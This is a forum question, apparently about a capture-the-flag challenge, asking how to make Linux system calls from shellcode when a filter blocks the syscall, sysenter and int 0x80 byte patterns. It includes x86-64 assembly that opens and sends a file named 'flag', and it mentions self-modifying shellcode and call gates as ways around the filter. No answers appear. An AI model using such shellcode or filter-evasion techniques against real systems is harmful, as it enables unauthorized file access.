How to read a file using shellcode without explicitly mentioning syscall (0x0f05) with write permissions disabled?

Viewed 571

I'm working on a ctf-like challenge and it is filtering my shellcode to make sure I don't have the hex value encodings of the syscall, sysenter and int instructions 0x0f05 0x0f34 and 0x80cd respectively. It has also disabled write permissions. I have a shellcode that can open a file which uses the sendfile system call but it includes the syscall instruction. The previous challenge was the same but with write permissions enabled. I successfully used a self-modifying shellcode in that challenge to get the flag.

This is the assembly code (with syscall) I used to read the file "flag" (GAS intel syntax):

    .globl _start

_start:
    .intel_syntax noprefix
    mov     rbx, 0x67616c66
    push    rbx
    mov     rax, 2
    mov     rdi, rsp
    mov     rsi, 0
    syscall

    mov     rdi, 1
    mov     rsi, rax
    mov     rdx, 0
    mov     r10, 1000
    mov     rax, 40
    syscall

    mov     rax, 60
    syscall

I have been searching for an alternative way to do a system call in Linux for the past day but it seems impossible (I'm a newbie to assembly).

I read about an alternative way to do system calls by Call Gates method, but it seems to rely on the Global Descriptor Table and I don't think I can access that due to ASLR (Correct me if I'm wrong).

I'm not necessarily looking for an exact answer but just looking for some help understanding a way I can do a system call in this conditions.

0 Answers
Related